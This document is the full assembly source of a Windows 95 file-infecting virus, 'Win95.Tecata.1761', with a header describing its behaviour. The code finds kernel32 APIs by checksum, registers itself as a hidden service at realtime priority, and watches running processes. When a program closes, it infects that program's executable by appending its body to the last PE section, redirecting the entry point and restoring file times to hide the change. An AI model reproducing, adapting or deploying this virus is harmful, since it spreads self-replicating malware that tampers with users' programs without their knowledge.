; Name : Win95.Tecata.1761 ; Origin : Russia ; Platform : Win9x (crash under NT) ; Resident : yes ; Poly : no ; payload : no ; destructiv : no ;details : virus stays as process in memory and checks ; currently runned processes using Snapshot functions ; After closing processes are infected by expanding ; the last section .386p .model flat,stdcall locals jumps extrn ExitProcess:PROC extrn MessageBoxA:PROC .data st db 'shit' .code startr: call MessageBoxA,0,offset mss2,offset mss1,0 jmp start mss1 db '[-=Win95.Tecata_v2.0=-]',0 mss2 db '[ Total length - ' mss6 db len/1000 mod 10+'0' mess3 db len/0100 mod 10+'0' mess4 db len/0010 mod 10+'0' mess5 db len/0001 mod 10+'0',' ]',0 len=offset snakee-offset start vonn: call ExitProcess,0 start: pushad call la la: pop ebp sub ebp,offset la ;---------------SETUP_OUR_SEH_________ call setup_seh mov esp,[esp+8] pop dword ptr fs:[0] pop eax jmp exit setup_seh: xor eax,eax push dword ptr fs:[eax] mov dword ptr fs:[eax],esp ;----------------FIND_KERNEL32_BASE___________ mov edx,dword ptr [esp+40] qwerty: dec edx cmp word ptr [edx],05a4ch jb qwerty cmp word ptr [edx],05a4eh ja qwerty movzx esi,word ptr [edx+3ch] cmp word ptr [edx+esi],'EP' jne qwerty ;-------------------FIND_APIZ(edx-kernel base)--------------- lea esi,[close+ebp] mov ecx,28 zdf: push ecx push esi call getapi pop esi pop ecx mov dword ptr [esi+4],eax add esi,8 loop zdf ;---------------------end_find_apiz---------- lea eax,[atomn+ebp] push eax call [fndatoma+ebp] ;is atom already exist or eax,eax jnz exit ;-----------RESTORE_SEH_________ pop dword ptr fs:[0] pop eax ;________END_RESTORE_SEH________ call dword ptr [linea+ebp] ;get command line xchg eax,edi mov esi,edi mov ecx,150 mov eax,'qqqq' ;is caoomand line smart? repne scasd je install push 400 push 0 call dword ptr [alloca+ebp] ;get some fucking memory or eax,eax jz exit mov edi,eax ;------- push edi inc esi mov ecx,250 push edi rep movsb pop edi ;transform comline to path mov ecx,250 mov al,'.' repne scasb mov byte ptr [edi+3],0 pop edi ;;-------- mov ebx,edi add ebx,270 push ebx add ebx,70 push ebx xor eax,eax push eax ;0 - currentdir push eax ;environment push eax ;flags push eax ;inherit handles push eax ;threads security push eax ;process security lea eax,[commline+ebp] push eax push edi call dword ptr [ebp+crproca] ;returns HANDLER exit: popad db 068h orghost dd offset vonn ; domoy ret ;--------------------- getapi: movzx edi,word ptr [edx+3ch] mov ebx,dword ptr [edx+edi+78h] add ebx,edx mov edi,dword ptr [ebx+20h] add edi,edx xor eax,eax as1: push edi mov edi,dword ptr [edi] add edi,edx ;edi points to currnet name asss: movzx ecx,word ptr [edi] cmp word ptr [esi],cx jne fgh xor ecx,ecx poisk: cmp byte ptr [edi],0 je isall push eax movzx eax,byte ptr [edi] add ecx,eax pop eax inc edi jmp poisk isall: cmp cx,word ptr [esi+2] je find fgh: inc eax pop edi add edi,4 jmp as1 find: pop ecx ; eax-num shl eax,1 add eax,dword ptr [ebx+24h] add eax,edx xor esi,esi xchg eax,esi lodsw shl eax,2 add eax,dword ptr [ebx+1ch] add eax,edx mov esi,eax lodsd add eax,edx ret ;------------ install: call @913 atomn db '[TeCaTa livez here]',0 ;just a fakin sign @913: call dword ptr [addatoma+ebp] xor ebx,ebx push ebx push 3000 push ebx ;create heap call dword ptr [h1+ebp] or eax,eax jz doloy push 2990 push 8 ;get some memory from heap push eax ;ripped from voodoo ;) call dword ptr [h2+ebp] mov dword ptr [memadr+ebp],eax add eax,1900 mov dword ptr [process32+ebp],eax mov byte ptr [flag+ebp],bl mov dword ptr [num+ebp],ebx call dword ptr [getpra+ebp] ;get current process mov esi,eax push 1 ; Register the current running push ebx ; process as a service. call dword ptr [regisa+ebp] push 100h ; realtime priority class push esi ; HANDLEof process call dword ptr [priora+ebp] ;----------------THIZ_PROC_CALLS_FROM_TIME_TO_TIME_________ timerproc: cmp byte ptr [flag+ebp],0 jne zanato ;is buzy now? inc byte ptr [flag+ebp] call snapshot2 call snapshot1 dec byte ptr [flag+ebp] zanato: push 3000 call dword ptr [sleepa+ebp] jmp timerproc doloy: call dword ptr [exitpr+ebp],0 ;-------------- snap_proc: call dword ptr [snapa+ebp],2,0 mov dword ptr [snaphandle+ebp],eax ret first_proc: mov ecx,dword ptr [process32+ebp] mov dword ptr [ecx],1024 push ecx push eax call dword ptr [firsta+ebp] ret next_proc: mov eax,dword ptr [process32+ebp] push eax mov eax,dword ptr [snaphandle+ebp] push eax call dword ptr [nexta+ebp] ret close_proc: db 068h snaphandle dd 0 call dword ptr [closea+ebp] ret ;----------------SNAPSHOT1--------------- snapshot1: mov edi,dword ptr [memadr+ebp] xor eax,eax mov byte [edi],al inc edi call snap_proc cmp eax,-1 je exitsnap xor ebx,ebx xor esi,esi call first_proc @518: or eax,eax jz closet2 mov edx,dword ptr [process32+ebp] add edx,8 mov edx,dword ptr [edx] mov dword ptr [mass+esi+ebp],edx inc ebx add esi,4 ;------ mov ecx,dword ptr [process32+ebp] add ecx,9*4 zzzxc2: mov al,byte ptr [ecx] or al,al jz asd2 mov byte ptr [edi],al inc ecx inc edi jmp zzzxc2 asd2: mov byte ptr [edi],0 inc edi ;------- call next_proc jmp @518 closet2: mov dword ptr [num+ebp],ebx call close_proc exitsnap: ret ;-=---------------------- snapshot2: cmp dword ptr [num+ebp],0 je exitsnap2 call snap_proc cmp eax,-1 je exitsnap2 call first_proc @5189: or eax,eax jz closhndl ;------ db 0b9h ;mov ecx,dword ptr [num+ebp] num dd 0 db 0b8h process32 dd 0 add eax,8 mov eax,dword ptr [eax] xor esi,esi @8301: cmp dword ptr [mass+esi+ebp],eax jne dalshe2 mov dword ptr [mass+ebp+esi],'null' dalshe2: add esi,4 loop @8301 call next_proc jmp @5189 closhndl: call close_proc closet: pushad mov ecx,dword ptr [num+ebp] xor esi,esi xor ebx,ebx @481: mov eax,dword ptr [mass+esi+ebp] cmp eax,'null' je @6222 pushad ;----------------------- get_path: ;ebx-nomer ; db 0beh ; mov esi,dword ptr [memadr+ebp] memadr dd 0 xor edi,edi @734: inc esi mov al,byte ptr [esi-1] or al,al jnz @734 is_all: cmp edi,ebx je alldone inc edi jmp @734 alldone: mov ebx,esi chek_exe: ;in ebx -path mov ecx,260 mov esi,ebx is_exec: cmp byte ptr [esi],0 je nicht cmp dword ptr [esi],'exe.' je yes cmp dword ptr [esi],'EXE.' je yes vvb: inc esi loop is_exec yes: ; cmp dword ptr [esi-4],'QQQQ' ; jne vvb ;____________SET_NORMAL_ATTRIBUTES_________ push 80h push ebx call dword ptr [atriba+ebp] ;__________WHO_KILLED_THE BAMBY?_____________________ call kill ;in ebx -path ;------------------------------ nicht: ;-------------------- popad @6222: add esi,4 inc ebx loop @481 popad exitsnap2: ret ;------------------------------------------ commline db 'qqqq',0 close dw 'lC' dw 'C'+'l'+'o'+'s'+'e'+'H'+'a'+'n'+'d'+'l'+'e' closea dd 0 pofinter dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'P'+'o'+'i'+'n'+'t'+'e'+'r' pointera dd 0 lofad dw 'oL' dw 'L'+'o'+'a'+'d'+'L'+'i'+'b'+'r'+'a'+'r'+'y'+'A' loada dd 0 getfadr dw 'eG' dw 'G'+'e'+'t'+'P'+'r'+'o'+'c'+'A'+'d'+'d'+'r'+'e'+'s'+'s' getadra dd 0 allfoc dw 'lG' dw 'G'+'l'+'o'+'b'+'a'+'l'+'A'+'l'+'l'+'o'+'c' alloca dd 0 opefn dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'F'+'i'+'l'+'e'+'A' opena dd 0 crfproc dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'P'+'r'+'o'+'c'+'e'+'s'+'s'+'A' crproca dd 0 lfine dw 'eG' dw 'G'+'e'+'t'+'C'+'o'+'m'+'m'+'a'+'n'+'d'+'L'+'i'+'n'+'e'+'A' linea dd 0 getfpr dw 'eG' dw 'G'+'e'+'t'+'C'+'u'+'r'+'r'+'e'+'n'+'t'+'P'+'r'+'o'+'c'+'e'+'s'+'s' getpra dd 0 regfis dw 'eR' dw 'R'+'e'+'g'+'i'+'s'+'t'+'e'+'r'+'S'+'e'+'r'+'v'+'i'+'c'+'e'+'P'+'r'+'o'+'c'+'e'+'s'+'s' regisa dd 0 priofr dw 'eS' dw 'S'+'e'+'t'+'P'+'r'+'i'+'o'+'r'+'i'+'t'+'y'+'C'+'l'+'a'+'s'+'s' priora dd 0 snapf dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'T'+'o'+'o'+'l'+'h'+'e'+'l'+'p'+'3'+'2'+'S'+'n'+'a'+'p'+'s'+'h'+'o'+'t' snapa dd 0 firsef dw 'rP' dw 'P'+'r'+'o'+'c'+'e'+'s'+'s'+'3'+'2'+'F'+'i'+'r'+'s'+'t' firsta dd 0 nextf1 dw 'rP' dw 'P'+'r'+'o'+'c'+'e'+'s'+'s'+'3'+'2'+'N'+'e'+'x'+'t' nexta dd 0 craftom dw 'lG' dw 'G'+'l'+'o'+'b'+'a'+'l'+'A'+'d'+'d'+'A'+'t'+'o'+'m'+'A' addatoma dd 0 fnfdatom dw 'lG' dw 'G'+'l'+'o'+'b'+'a'+'l'+'F'+'i'+'n'+'d'+'A'+'t'+'o'+'m'+'A' fndatoma dd 0 heapcr dw 'eH' dw 'H'+'e'+'a'+'p'+'C'+'r'+'e'+'a'+'t'+'e' h1 dd 0 hfeapal dw 'eH' dw 'H'+'e'+'a'+'p'+'A'+'l'+'l'+'o'+'c' h2 dd 0 dsad dw 'lS' dw 'S'+'l'+'e'+'e'+'p' sleepa dd 0 exxx dw 'xE' dw 'E'+'x'+'i'+'t'+'P'+'r'+'o'+'c'+'e'+'s'+'s' exitpr dd 0 atrr dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'A'+'t'+'t'+'r'+'i'+'b'+'u'+'t'+'e'+'s'+'A' atriba dd 0 sadfsdf dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'F'+'i'+'l'+'e'+'M'+'a'+'p'+'p'+'i'+'n'+'g'+'A' crtmap dd 0 sfdsfsd dw 'aM' dw 'M'+'a'+'p'+'V'+'i'+'e'+'w'+'O'+'f'+'F'+'i'+'l'+'e' mapfile dd 0 sadada dw 'nU' dw 'U'+'n'+'m'+'a'+'p'+'V'+'i'+'e'+'w'+'O'+'f'+'F'+'i'+'l'+'e' unmapa dd 0 asdsad dw 'eG' dw 'G'+'e'+'t'+'F'+'i'+'l'+'e'+'S'+'i'+'z'+'e' getsize dd 0 afgsg dw 'eS' dw 'S'+'e'+'t'+'E'+'n'+'d'+'O'+'f'+'F'+'i'+'l'+'e' setend dd 0 name1 dw 'eG' dw 'G'+'e'+'t'+'F'+'i'+'l'+'e'+'T'+'i'+'m'+'e' gettime dd 0 name2 dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'T'+'i'+'m'+'e' settime dd 0 datas dd 6 dup (0) mass dd 25 dup(0) ;-----------INFECTION_PROCEDURE---------------- kill: ;path in ebx xor eax,eax push eax ;null push 80h ;flags push 3 ;create push eax ;null push eax ;null ;open flesh push 80000000h or 40000000h push ebx call dword ptr [opena+ebp] jc exit1 mov dword ptr [mass+ebp],eax xchg eax,ebx lea eax,[datas+ebp] push eax add eax,8 push eax add eax,8 push eax push ebx call dword ptr [gettime+ebp] jc back lea eax,[size+ebp] push eax push ebx call dword ptr [getsize+ebp] jc exit3 xchg edi,eax mov dword ptr [size+ebp],edi add edi,20000 xor esi,esi push esi push edi push esi push 4 push esi push ebx call dword ptr [crtmap+ebp] or eax,eax jz back xchg eax,ebx push edi push esi push esi push 2 push ebx call dword ptr [mapfile+ebp] or eax,eax jz closemap xchg edi,eax cmp word ptr [edi],05a4ch jb unmap cmp word ptr [edi],05a4eh ja unmap movzx esi,word ptr [edi+3ch] cmp esi,1000 ja unmap cmp word ptr [esi+edi],'EP' jne unmap test dword ptr [esi+edi+22],2000h ;DLL ? jnz unmap cmp word ptr [edi+esi+8],'EG' ;is already infected? je unmap mov word ptr [edi+esi+8],'EG' ;set infection flag movzx edx,word ptr [esi+edi+6] imul edx,40 movzx eax,word ptr [esi+edi+20] add edx,eax sub edx,40-24 ;set edx to last section add edx,esi add edx,edi mov eax,dword ptr [edi+esi+40] add eax,dword ptr [edi+esi+52] ;save orghost mov dword ptr [orghost+ebp],eax ;--------------------------- mov eax,dword ptr [edi+esi+0a0h] cmp dword ptr [edx+12],eax ;are there any fix upzz jne expand mov dword ptr [edi+esi+40],eax ;???? 12 ili 20 ;-------- mov ecx,offset snakee-offset start cmp dword ptr [edx+16],ecx ja inaf mov eax,dword ptr [edx+20] add eax,ecx mov dword ptr [size+ebp],eax inaf: mov dword ptr [edx+8],ecx mov dword ptr [edx+16],ecx pushad lea esi,[start+ebp] add edi,dword ptr [edx+20] rep movsb popad mov dword ptr [edi+esi+0a0h],0 jmp donne expand: mov eax,dword ptr [edx+8] add eax,dword ptr [edx+12] ;new entry mov dword ptr [edi+esi+40],eax mov eax,dword ptr [edx+8] add eax,dword ptr [edx+20] ;place to write in file pushad mov ecx,offset snakee-offset start push ecx add ecx,eax cmp dword ptr [size+ebp],ecx ja nenado mov dword ptr [size+ebp],ecx nenado: pop ecx push edi add edi,eax lea esi,[start+ebp] rep movsb ;write the body pop edi popad push edx mov eax,dword ptr [edx+16] add eax,snakee-start xor edx,edx mov ecx,dword ptr [esi+edi+60] div ecx inc eax mul ecx pop edx mov dword ptr [edx+16],eax mov dword ptr [edx+8],eax donne: ;---- mov eax,dword ptr [edx+8] add eax,dword ptr [edx+12] ;make & write image_size mov dword ptr [esi+edi+80],eax ;------ mov [edx+36],0e0000040h ;set attributes ;------------ ;------ unmap: push edi call dword ptr [unmapa+ebp] closemap: push ebx call dword ptr [closea+ebp] mov ebx,dword ptr [mass+ebp] xor eax,eax push eax push eax db 068h size dd 0 ;set pointer to cutting place push ebx call dword ptr [pointera+ebp] jc back push ebx ;cut the file call dword ptr [setend+ebp] back: lea eax,[datas+ebp] push eax add eax,8 push eax add eax,8 push eax push dword ptr [mass+ebp] call dword ptr [settime+ebp] exit3: push dword ptr [mass+ebp] call dword ptr [closea+ebp] exit1: ret ;<><><><><><><><><><><><>< flag db 0 message dd 0 snakee: end startr